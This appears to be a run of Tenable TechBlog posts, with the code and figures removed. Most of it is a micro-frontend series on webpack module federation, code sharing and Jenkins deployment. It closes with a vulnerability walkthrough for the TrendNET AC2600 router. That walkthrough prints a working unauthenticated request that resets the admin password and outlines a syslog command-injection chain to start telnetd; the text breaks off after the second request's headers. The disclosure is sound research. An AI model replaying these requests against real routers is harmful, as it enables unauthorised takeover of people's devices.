The Serve Command

One of the most important things we did here was create a serve.js file that allowed us to build/serve only those micro-apps an engineer needed to work on. This increased the speed at which our engineers got the application running, while also consuming as little local memory as possible. Below is a general breakdown of what that file does:

You can see in our webpack configuration below where we send the ready message (line 193). The serve command above listens for that message (line 26 above) and uses it to keep track of when a particular micro-app is done compiling.

Remote Utilities

Additionally, we created some remote utilities that allowed us to consistently manage our remotes. Specifically, it would return the name of the remotes along with the port they should run on. As you can see below, this logic is based on the workspace.json file. This was done so that if a new micro-app was added it would be automatically picked up without any additional configuration by the engineer.

Putting It All Together

Why was all this necessary? One of the powerful features of module federation is that all micro-apps are capable of being built independently. This was the purpose of the serve script shown above, i.e. it enabled us to spin up a series of micro-apps based on our needs. For example, with this logic in place, we could accommodate a host of various engineering needs:

  • Host only — If we wanted to spin up the Host application we could run npm run serve (the command defaults to spinning up Host).
  • Host & Application1 — If we wanted to spin up both Host and Application1, we could run npm run serve --apps=application-1.
  • Application2 Only — If we already had the Host and Application1 running, and we now wanted to spin up Application2 without having to rebuild things, we could run npm run serve --apps=application-2 --appOnly.
  • All — If we wanted to spin up everything, we could run npm run serve --all.

You can easily imagine that as your application grows and your codebase gets larger and larger, this type of functionality can be extremely powerful since you only have to build the parts of the application related to what you’re working on. This allowed us to speed up our boot time by 2x and our rebuild time by 7x, which was a significant improvement.

Note: If you use Visual Studio, you can accomplish some of this same functionality through the NX Console extension.

Loading Your Micro-Apps — The Static Approach

In the previous article, when it came to importing and using Application 1 and 2, we simply imported the micro-apps at the top of the bootstrap file and hard coded the remote entries in the index.html file:

Application 1 & 2 are imported at the top of the file, which means they have to be loaded right away
The moment our app loads, it has to load in the remote entry files for each micro-app

However in the real world, this is not the best approach. By taking this approach, the moment your application runs, it is forced to load in the remote entry files for every single micro-app. For a real world application that has many micro-apps, this means the performance of your initial load will most likely be impacted. Additionally, loading in all the micro-apps as we’re doing in the index.html file above is not very flexible. Imagine some of your micro-apps are behind feature flags that only certain customers can access. In this case, it would be much better if the micro-apps could be loaded in dynamically only when a particular route is hit.

In our initial approach with this new architecture, we made this mistake and paid for it from a performance perspective. We noticed that as we added more micro-apps, our initial load was getting slower. We finally discovered the issue was related to the fact that we were loading in our remotes using this static approach.

Loading Your Micro-Apps — The Dynamic Approach

Leveraging the remote utilities we discussed above, you can see how we pass the remotes and their associated ports in the webpack build via the REMOTE_INFO property. This global property will be accessed later on in our code when it’s time to load the micro-apps dynamically.

Once we had the necessary information we needed for the remotes (via the REMOTE_INFO variable), we then updated our bootstrap.jsx file to leverage a new component we discuss below called <MicroApp />. The purpose of this component was to dynamically attach the remote entry to the page and then initialize the micro-app lazily so it could be leveraged by Host. You can see the actual component never gets loaded until we hit a path where it is needed. This ensures that a given micro-app is never loaded in until it’s actually needed, leading to a huge boost in performance.

The actual logic of the <MicroApp /> component is highlighted below. This approach is a variation of the example shown here. In a nutshell, this logic dynamically injects the <script src=”…remoteEntry.js”></script> tag into the index.html file when needed, and initializes the remote. Once initialized, the remote and any exposed component can be imported by the Host application like any other import.

Summary

By making the changes above, we were able to significantly improve our overall performance. We did this by only loading in the code we needed for a given micro-app at the time it was needed (versus everything at once). Additionally, when our team added a new micro-app, our script was capable of handling it automatically. This approach allowed our teams to work more efficiently, and allowed us to significantly reduce the initial load time of our application. See the next article to learn about how we dealt with our vendor libraries.


5. Module Federation — Managing Your Micro-Apps was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

6. Module Federation — Sharing Vendor Code

Module Federation — Sharing Vendor Code

This is post 6 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing vendor library code between applications and some related best practices.

The Problem

One of the most important aspects of using module federation is sharing code. When a micro-app gets built, it contains all the files it needs to run. As stated by webpack, “These separate builds should not have dependencies between each other, so they can be developed and deployed individually”. In reality, this means if you build a micro-app and investigate the files, you will see that it has all the code it needs to run independently. In this article, we’re going to focus on vendor code (the code coming from your node_modules directory). However, as you’ll see in the next article of the series, this also applies to your custom libraries (the code living in libs). As illustrated below, App A and B both use vendor lib 6, and when these micro-apps are built they each contain a version of that library within their build artifact.

Why is this important? We’ll use the diagram below to demonstrate. Without sharing code between the micro-apps, when we load in App A, it loads in all the vendor libraries it needs. Then, when we navigate to App B, it also loads in all the libraries it needs. The issue is that we’ve already loaded in a number of libraries when we first loaded App A that could have been leveraged by App B (ex. Vendor Lib 1). From a customer perspective, this means they’re now pulling down a lot more Javascript than they should be.

The Solution

This is where module federation shines. By telling module federation what should be shared, the micro-apps can now share code between themselves when appropriate. Now, when we load App B, it’s first going to check and see what App A already loaded in and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it proceeds to load its own. For example, App A needs Vendor lib 5, but since no other application is using that library, there’s no need to share it.

Sharing code between the micro-apps is critical for performance and ensures that customers are only pulling down the code they truly need to run a given application.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing vendor code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

Now that we understand how libraries are built for each micro-app and why we should share them, let’s see how this actually works. The shared property of the ModuleFederationPlugin is where you define the libraries that should be shared between the micro-apps. Below, we are passing a variable called npmSharedLibs to this property:

If we print out the value of that variable, we’ll see the following:

This tells module federation that the three libraries should be shared, and more specifically that they are singletons. This means it could actually break our application if a micro-app attempted to load its own version. Setting singleton to true ensures that only one version of the library is loaded (note: this property will not be needed for most libraries). You’ll also notice we set a version, which comes from the version defined for the given library in our package.json file. This is important because anytime we update a library, that version will dynamically change. Libraries only get shared if they have a compatible version. You can read more about these properties here.

If we spin up the application and investigate the network traffic with a focus on the react library, we’ll see that only one file gets loaded in and it comes from port 3000 (our Host application). This is a result of defining react in the shared property:

Now let’s take a look at a vendor library that hasn’t been shared yet, called @styled-system/theme-get. If we investigate our network traffic, we’ll discover that this library gets embedded into a vendor file for each micro-app. The three files highlighted below come from each of the micro-apps. You can imagine that as your libraries grow, the size of these vendor files may get quite large, and it would be better if we could share these libraries.

We will now add this library to the shared property:

If we investigate the network traffic again and search for this library, we’ll see it has been split into its own file. In this case, the Host application (which loads before everything else) loads in the library first (we know this since the file is coming from port 3000). When the other applications load in, they determine that they don’t have to use their own version of this library since it’s already been loaded in.

This very significant feature of module federation is critical for an architecture like this to succeed from a performance perspective.

Summary

Sharing code is one of the most important aspects of using module federation. Without this mechanism in place, your application would suffer from performance issues as your customers pull down a lot of duplicate code each time they accessed a different micro-app. Using the approaches above, you can ensure that your micro-apps are both independent but also capable of sharing code between themselves when appropriate. This the best of the both worlds, and is what allows a micro-frontend architecture to succeed. Now that you understand how vendor libraries are shared, we can take the same principles and apply them to our self-created libraries that live in the libs directory, which we discuss in the next article of the series.


6. Module Federation — Sharing Vendor Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

7. Module Federation — Sharing Library Code

Module Federation — Sharing Library Code

This is post 7 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing your custom library code between applications and some related best practices.

The Problem

As discussed in the previous article, sharing code is critical to using module federation successfully. In the last article we focused on sharing vendor code. Now, we want to take those same principles and apply them to the custom library code we have living in the libs directory. As illustrated below, App A and B both use Lib 1. When these micro-apps are built, they each contain a version of that library within their build artifact.

Assuming you read the previous article, you now know why this is important. As shown in the diagram below, when App A is loaded in, it pulls down all the libraries shown. When App B is loaded in it’s going to do the same thing. The problem is once again that App B is pulling down duplicate libraries that App A has already loaded in.

The Solution

Similar to the vendor libraries approach, we need to tell module federation that we would like to share these custom libraries. This way once we load in App B, it’s first going to check and see what App A has already loaded and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it will proceed to load on its own. Otherwise, if it’s the only micro-app using that library, it will simply bundle a version of that library within itself (ex. Lib 2).

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing custom library code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

To demonstrate sharing libraries, we’re going to focus on Test Component 1 that is imported by the Host and Application 1:

This particular component lives in the design-system/components workspace:

We leverage the tsconfig.base.json file to build out our aliases dynamically based on the component paths defined in that file. This is an easy way to ensure that as new paths are added to your libraries, they are automatically picked up by webpack:

The aliases in our webpack.config are built dynamically based off the paths in the tsconfig.base.json file

How does webpack currently treat this library code? If we were to investigate the network traffic before sharing anything, we would see that the code for this component is embedded in two separate files specific to both Host and Application 1 (the code specific to Host is shown below as an example). At this point the code is not shared in any way and each application simply pulls the library code from its own bundle.

As your application grows, so does the amount of code you share. At a certain point, it becomes a performance issue when each application pulls in its own unique library code. We’re now going to update the shared property of the ModuleFederationPlugin to include these custom libraries.

Sharing our libraries is similar to the vendor libraries discussed in the previous article. However, the mechanism of defining a version is different. With vendor libraries, we were able to rely on the versions defined in the package.json file. For our custom libraries, we don’t have this concept (though you could technically introduce something like that if you wanted). To solve this problem, we decided to use a unique identifier to identify the library version. Specifically, when we build a particular library, we actually look at the folder containing the library and generate a unique hash based off of the contents of the directory. This way, if the contents of the folder change, then the version does as well. By doing this, we can ensure micro-apps will only share custom libraries if the contents of the library match.

We leverage the hashElement method from folder-hash library to create our hash ID
Each lib now has a unique version based on the hash ID generated

Note: We are once again leveraging the tsconfig.base.json to dynamically build out the libs that should be shared. We used a similar approach above for building out our aliases.

If we investigate the network traffic again and look for libs_design-system_components (webpack’s filename for the import from @microfrontend-demo/design-system/components), we can see that this particular library has now been split into its own individual file. Furthermore, only one version gets loaded by the Host application (port 3000). This indicates that we are now sharing the code from @microfrontend-demo/design-system/components between the micro-apps.

Going More Granular

Before You Proceed: If you wish to see the code associated with the following section, you can check it out in this branch.

Currently, when we import one of the test components, it comes from the index file shown below. This means the code for all three of these components gets bundled together into one file shown above as “libs_design-system_components_src_index…”.

Imagine that we continue to add more components:

You may get to a certain point where you think it would be beneficial to not bundle these files together into one big file. Instead, you want to import each individual component. Since the alias configuration in webpack is already leveraging the paths in the tsconfig.base.json file to build out these aliases dynamically (discussed above), we can simply update that file and provide all the specific paths to each component:

We can now import each one of these individual components:

If we investigate our network traffic, we can see that each one of those imports gets broken out into its own individual file:

This approach has several pros and cons that we discovered along the way:

Pros

  • Less Code To Pull Down — By making each individual component a direct import and by listing the component in the shared array of the ModuleFederationPlugin, we ensure that the micro-apps share as much library code as possible.
  • Only The Code That Is Needed Is Used — If a micro-app only needs to use one or two of the components in a library, they aren’t penalized by having to import a large bundle containing more than they need.

Cons

  • Performance — Bundling, the process of taking a number of separate files and consolidating them into one larger file, is a really good thing. If you continue down the granular path for everything in your libraries, you may very well find yourself in a scenario where you are importing hundreds of files in the browser. When it comes to browser performance and caching, there’s a balance to loading a lot of small granular files versus a few larger ones that have been bundled.

We recommend you choose the solution that works best based on your codebase. For some applications, going granular is an ideal solution and leads to the best performance in your application. However, for another application this could be a very bad decision, and your customers could end up having to pull down a ton of granular files when it would have made more sense to only have them pull down one larger file. So as we did, you’ll want to do your own performance analysis and use that as the basis for your approach.

Pitfalls

When it came to the code in our libs directory, we discovered two important things along the way that you should be aware of.

Hybrid Sharing Leads To Bloat — When we first started using module federation, we had a library called tenable.io/common. This was a relic from our initial architecture and essentially housed all the shared code that our various applications used. Since this was originally a directory (and not a library), our imports from it varied quite a bit. As shown below, at times we imported from the main index file of tenable-io/common (tenable-io/common.js), but in other instances we imported from sub directories (ex. tenable-io/common/component.js) and even specific files (tenable-io/component/component1.js). To avoid updating all of these import statements to use a consistent approach (ex. only importing from the index of tenable-io/common), we opted to expose every single file in this directory and shared it via module federation.

To demonstrate why this was a bad idea, we’ll walk through each of these import types: starting from the most global in nature (importing the main index file) and moving towards the most granular (importing a specific file). As shown below, the application begins by importing the main index file which exposes everything in tenable-io/common. This means that when webpack bundles everything together, one large file is created for this import statement that contains everything (we’ll call it common.js).

We then move down a level in our import statements and import from subdirectories within tenable-io/common (components and utilities). Similar to our main index file, these import statements contain everything within their directories. Can you see the problem? This code is already contained in the common.js file above. We now have bloat in our system that causes the customer to pull down more javascript than necessary.

We now get to the most granular import statement where we’re importing from a specific file. At this point, we have a lot of bloat in our system as these individual files are already contained within both import types above.

As you can imagine, this can have a dramatic impact on the performance of your application. For us, this was evident in our application early on and it was not until we did a thorough performance analysis that we discovered the culprit. We highly recommend you evaluate the structure of your libraries and determine what’s going to work best for you.

Sharing State/Storage/Theme — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state and theming. Typically, shared code lives in an actual file (some-file.js) that resides within a micro-app’s bundle. For example, let’s say we have a notifications library shared between the micro-apps. In the first update, the presentation portion of this library is updated. However, only App B gets deployed to production with the new code. In this case, that’s okay because the code is constrained to an actual file. In this instance, App A and B will use their own versions within each of their bundles. As a result, they can both operate independently without bugs.

However, when it comes to things like state (Redux for us), storage (window.storage, document.cookies, etc.) and theming (styled-components for us), you cannot rely on this. This is because these items live in memory and are shared at a global level, which means you can’t rely on them being confined to a physical file. To demonstrate this, let’s say that we’ve made a change to the way state is getting stored and accessed. Specifically, we went from storing our notifications under an object called notices to storing them under notifications. In this instance, once our applications get out of sync on production (i.e. they’re not leveraging the same version of shared code where this change was made), the applications will attempt to store and access notifications in memory in two different ways. If you are looking to create challenging bugs, this is a great way to do it.

As we soon discovered, most of our bugs/issues resulting from this new architecture came as a result of updating one of these areas (state, theme, storage) and allowing the micro-apps to deploy at their own pace. In these instances, we needed to ensure that all the micro-apps were deployed at the same time to ensure the applications and the state, store, and theming were all in sync. You can read more about how we handled this via a Jenkins bootstrapper job in the next article.

Summary

At this point you should have a fairly good grasp on how both vendor libraries and custom libraries are shared in the module federation system. See the next article in the series to learn how we build and deploy our application.


7. Module Federation — Sharing Library Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

8. Building & Deploying

Building & Deploying

This is post 8 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the final phase of our new architecture where we build and deploy our application utilizing our new micro-frontend model.

The Problem

If you have followed along up until this point, you can see how we started with a relatively simple architecture. Like a lot of companies, our build and deployment flow looked something like this:

  1. An engineer merges their code to master.
  2. A Jenkins build is triggered that lints, tests, and builds the entire application.
  3. The built application is then deployed to a QA environment.
  4. End-2-End (E2E) tests are run against the QA environment.
  5. The application is deployed to production. If it’s a CICD flow this occurs automatically if E2E tests pass, otherwise this would be a manual deployment.

In our new flow this would no longer work. In fact, one of our biggest challenges in implementing this new architecture was in setting up the build and deployment process to transition from a single build (as demonstrated above) to multiple applications and libraries.

The Solution

Our new solution involved three primary Jenkins jobs:

  1. Seed Job — Responsible for identifying what applications/libraries needed to be rebuilt (via the nx affected command). Once this was determined, its primary purpose was to then kick off n+ of the next two jobs discussed.
  2. Library Job — Responsible for linting and testing any library workspace that was impacted by a change.
  3. Micro-App Jobs — A series of jobs pertaining to each micro-app. Responsible for linting, testing, building, and deploying the micro-app.

With this understanding in place, let’s walk through the steps of the new flow:

Phase 1 — In our new flow, phase 1 includes building and deploying the code to our QA environments where it can be properly tested and viewed by our various internal stakeholders (engineers, quality assurance, etc.):

  1. An engineer merges their code to master. In the diagram below, an engineer on Team 3 merges some code that updates something in their application (Application C).
  2. The Jenkins seed job is triggered, and it identifies what applications and libraries were impacted by this change. This job now kicks off an entirely independent pipeline related to the updated application. In this case, it kicked off the Application C pipeline in Jenkins.
  3. The pipeline now lints, tests, and builds Application C. It’s important to note here how it’s only dealing with a piece of the overall application. This greatly improves the overall build times and avoids long queues of builds waiting to run.
  4. The built application is then deployed to the QA environments.
  5. End-2-End (E2E) tests are run against the QA environments.
  6. Our deployment is now complete. For our purposes, we felt that a manual deployment to production was a safe approach for us and one that still offered us the flexibility and efficiency we needed.
Phase 1 Highlighted — Deploying to QA environments

Phase 2 — This phase (shown in the diagram after the dotted line) occurred when an engineer was ready to deploy their code to production:

  1. An engineer deployed their given micro-app to staging. In this case, the engineer would go into the build for Application C and deploy from there.
  2. For our purposes, we deployed to a staging environment before production to perform a final spot check on our application. In this type of architecture, you may only encounter a bug related to the decoupled nature of your micro-apps. You can read more about this type of issue in the previous article under the Sharing State/Storage/Theme section. This final staging environment allowed us to catch these issues before they made their way to production.
  3. The application is then deployed to production.
Phase 2 Highlighted — Deploying to production environments

While this flow has more steps than our original one, we found that the pros outweigh the cons. Our builds are now more efficient as they can occur in parallel and only have to deal with a specific part of the repository. Additionally, our teams can now move at their own pace, deploying to production when they see fit.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn the specifics of how we build and deploy our applications.

Build Strategy

We will now discuss the three job types discussed above in more detail. These include the following: seed job, library job, and micro-app jobs.

The Seed Job

This job is responsible for first identifying what applications/libraries needed to be rebuilt. How is this done? We will now come full circle and understand the importance of introducing the NX framework that we discussed in a previous article. By taking advantage of this framework, we created a system by which we could identify which applications and libraries (our “workspaces”) were impacted by a given change in the system (via the nx affected command). Leveraging this functionality, the build logic was updated to include a Jenkins seed job. A seed job is a normal Jenkins job that runs a Job DSL script and in turn, the script contains instructions that create and trigger additional jobs. In our case, this included micro-app jobs and/or a library job which we’ll discuss in detail later.

Jenkins Status — An important aspect of the seed job is to provide a visualization for all the jobs it kicks off. All the triggered application jobs are shown in one place along with their status:

  • Green — Successful build
  • Yellow — Unstable
  • Blue — Still processing
  • Red (not shown) — Failed build

Github Status — Since multiple independent Jenkins builds are triggered for the same commit ID, we had to pay attention to the representation of the changes in GitHub to not lose visibility of broken builds in the PR process. Each job registers itself with a unique context with respect to github, providing feedback on what sub-job failed directly in the PR process:

Performance, Managing Dependencies — Before a given micro-app and/or library job can perform its necessary steps (lint, test, build), it needs to install the necessary dependencies for those actions (those defined in the package.json file of the project). Doing this every single time a job is run is very costly in terms of resources and performance. Since all of these jobs need the same dependencies, it makes much more sense if we can perform this action once so that all the jobs can leverage the same set of dependencies.

To accomplish this, the node execution environment was dockerised with all necessary dependencies installed inside a container. As shown below, the seed job maintains the responsibility for keeping this container in sync with the required dependencies. The seed job determines if a new container is required by checking if changes have been made to package.json. If changes are made, the seed job generates the new container prior to continuing any further analysis and/or build steps. The jobs that are kicked off by the seed (micro-app jobs and the library job) can then leverage that container for use:

This approach led to the following benefits:

  • Proved to be much faster than downloading all development dependencies for each build (step) every time needed.
  • The use of a pre-populated container reduced the load on the internal Nexus repository manager as well as the network traffic.
  • Allowed us to run the various build steps (lint, unit test, package) in parallel thus further improving the build times.

Performance, Limiting The Number Of Builds Run At Once — To facilitate the smooth operation of the system, the seed jobs on master and feature branch builds use slightly different logic with respect to the number of builds that can be kicked off at any one time. This is necessary as we have a large number of active development branches and triggering excessive jobs can lead to resource shortages, especially with required agents. When it comes to the concurrency of execution, the differences between the two are:

  • Master branch — Commits immediately trigger all builds concurrently.
  • Feature branches — Allow only one seed job per branch to avoid system overload as every commit could trigger 10+ sub jobs depending on the location of the changes.

Another attempt to reduce the amount of builds generated is the way in which the nx affected command gets used by the master branch versus the feature branches:

  • Master branch — Will be called against the latest tag created for each application build. Each master / production build produces a tag of the form APP<uniqueAppId>_<buildversion>. This is used to determine if the specific application needs to be rebuilt based on the changes.
  • Feature branches — We use master as a reference for the first build on the feature branch, and any subsequent build will use the commit-id of the last successful build on that branch. This way, we are not constantly rebuilding all applications that may be affected by a diff against master, but only the applications that are changed by the commit.

To summarize the role of the seed job, the diagram below showcases the logical steps it takes to accomplish the tasks discussed above.

The Library Job

We will now dive into the jobs that Seed kicks off, starting with the library job. As discussed in our previous articles, our applications share code from a libs directory in our repository.

Before we go further, it’s important to understand how library code gets built and deployed. When a micro-app is built (ex. nx build host), its deployment package contains not only the application code but also all the libraries that it depends on. When we build the Host and Application 1, it creates a number of files starting with “libs_…” and “node_modules…”. This demonstrates how all the shared code (both vendor libraries and your own custom libraries) needed by a micro-app is packaged within (i.e. the micro-apps are self-reliant). While it may look like your given micro-app is extremely bloated in terms of the number of files it contains, keep in mind that a lot of those files may not actually get leveraged if the micro-apps are sharing things appropriately.

This means building the actual library code is a part of each micro-app’s build step, which is discussed below. However, if library code is changed, we still need a way to lint and test that code. If you kicked off 5 micro-app jobs, you would not want each of those jobs to perform this action as they would all be linting and testing the exact same thing. Our solution to this was to have a separate Jenkins job just for our library code, as follows:

  1. Using the nx affected:libs command, we determine which library workspaces were impacted by the change in question.
  2. Our library job then lints/tests those workspaces. In parallel, our micro-apps also lint, test and build themselves.
  3. Before a micro-app can finish its job, it checks the status of the libs build. As long as the libs build was successful, it proceeds as normal. Otherwise, all micro-apps fail as well.

The Micro-App Jobs

Now that you understand how the seed and library jobs work, let’s get into the last job type: the micro-app jobs.

Configuration — As discussed previously, each micro-app has its own Jenkins build. The build logic for each application is implemented in a micro-app specific Jenkinsfile that is loaded at runtime for the application in question. The pattern for these small snippets of code looks something like the following:

The jenkins/Jenkinsfile.template (leveraged by each micro-app) defines the general build logic for a micro-application. The default configuration in that file can then be overwritten by the micro-app:

This approach allows all our build logic to be in a single place, while easily allowing us to add more micro-apps and scale accordingly. This combined with the job DSL makes adding a new application to the build / deployment logic a straightforward and easy to follow process.

Managing Parallel Jobs — When we first implemented the build logic for the jobs, we attempted to implement as many steps as possible in parallel to make the builds as fast as possible, which you can see in the Jenkins parallel step below:

After some testing, we found that linting + building the application together takes about as much time as running the unit tests for a given product. As a result, we combined the two steps (linting, building) into one (assets-build) to optimize the performance of our build. We highly recommend you do your own analysis, as this will vary per application.

Deployment strategy

Now that you understand how the build logic works in Jenkins, let’s see how things actually get deployed.

Checkpoints — When an engineer is ready to deploy their given micro-app to production, they use a checkpoint. Upon clicking into the build they wish to deploy, they select the checkpoints option. As discussed in our initial flow diagram, we force our engineers to first deploy to our staging environment for a final round of testing before they deploy their application to production.

The particular build in Jenkins that we wish to deploy
The details of the job above where we have the ability to deploy to staging via a checkpoint

Once approval is granted, the engineer can then deploy the micro-app to production using another checkpoint:

The build in Jenkins that was created after we clicked deployToQAStaging
The details of the job above where we have the ability to deploy to production via a checkpoint

S3 Strategy — The new logic required a rework of the whole deployment strategy as well. In our old architecture, the application was deployed as a whole to a new S3 location and then the central gateway application was informed of the new location. This forced the clients to reload the entire application as a whole.

Our new strategy reduces the deployment impact to the customer by only updating the code on S3 that actually changed. This way, whenever a customer pulls down the code for the application, they are pulling a majority of the code from their browser cache and only updated files have to be brought down from S3.

One thing we had to be careful about was ensuring the index.html file is only updated after all the granular files are pushed to S3. Otherwise, we run the risk of our updated application requesting files that may not have made their way to S3 yet.

Bootstrapper Job — As discussed above, micro-apps are typically deployed to an environment via an individual Jenkins job:

However, we ran into a number of instances where we needed to deploy all micro-apps at the same time. This included the following scenarios:

  • Shared state — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state. When we made updates to these areas, we could encounter bugs when the apps got out of sync.
  • Shared theme — Since we also had a global theme that all micro-apps inherited from, we could encounter styling issues when the theme was updated and apps got out of sync.
  • Vendor Library Update — Updating a vendor library like react where there could be only one version of the library loaded in.

To address these issues, we created the bootstrapper job. This job has two steps:

  1. Build — The job is run against a specific environment (qa-development, qa-staging, etc.) and pulls down a completely compiled version of the entire application.
  2. Deploy — The artifact from the build step can then be deployed to the specified environment.

Conclusion

Our new build and deployment flow was the final piece of our new architecture. Once it was in place, we were able to successfully deploy individual micro-apps to our various environments in a reliable and efficient manner. This was the final phase of our new architecture, please see the last article in this series for a quick recap of everything we learned.


8. Building & Deploying was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

9. Wrapping Up Our Journey Implementing a Micro Frontend

Wrapping Up Our Journey Implementing a Micro Frontend

We hope you now have a better understanding of how you can successfully create a micro-front end architecture. Before we call it a day, let’s give a quick recap of what was covered.

What You Learned

  • Why We implemented a micro front end architecture — You learned where we started, specifically what our architecture used to look like and where the problems existed. You then learned how we planned on solving those problems with a new architecture.
  • Introducing the Monorepo and NX — You learned how we combined two of our repositories into one: a monorepo. You then saw how we leveraged the NX framework to identify which part of the repository changed, so we only needed to rebuild that portion.
  • Introducing Module Federation — You learned how we leverage webpacks module federation to break our main application into a series of smaller applications called micro-apps, the purpose of which was to build and deploy these applications independently of one another.
  • Module Federation — Managing Your Micro-Apps — You learned how we consolidated configurations and logic pertaining to our micro-apps so we could easily manage and serve them as our codebase continued to grow.
  • Module Federation — Sharing Vendor Code — You learned the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — You learned the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — You learned how we build and deploy our application using this new model.

Key Takeaways

If you take anything away from this series, let it be the following:

The Earlier, The Better

We can tell you from experience that implementing an architecture like this is much easier if you have the opportunity to start from scratch. If you are lucky enough to start from scratch when building out an application and are interested in a micro-frontend, laying the foundation before anything else is going to make your development experience much better.

Evaluate Before You Act

Before you decide on an architecture like this, make sure it’s really what you want. Take the time to assess your issues and how your company operates. Without company support, pulling off this approach is extremely difficult.

Only Build What Changed

Using a tool like NX is critical to a monorepo, allowing you to only rebuild those parts of the system that were impacted by a change.

Micro-front Ends Are Not For Everyone

We know this type of architecture is not for everyone, and you should truly consider what your organization needs before going down this path. However, it has been very rewarding for us, and has truly transformed how we deliver solutions to our customers.

Don’t Forget To Share

When it comes to module federation, sharing is key. Learning when and how to share code is critical to the successful implementation of this architecture.

Be Careful Of What You Share

Sharing things like state between your micro-apps is a dangerous thing in a micro-frontend architecture. Learning to put safeguards in place around these areas is critical, as well as knowing when it might be necessary to deploy all your applications at once.

Summary

We hope you enjoyed this series and learned a thing or two about the power of NX and module federation. If this article can help just one engineer avoid a mistake we made, then we’ll have done our job. Happy coding!


9. Wrapping Up Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

TrendNET AC2600 RCE via WAN

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
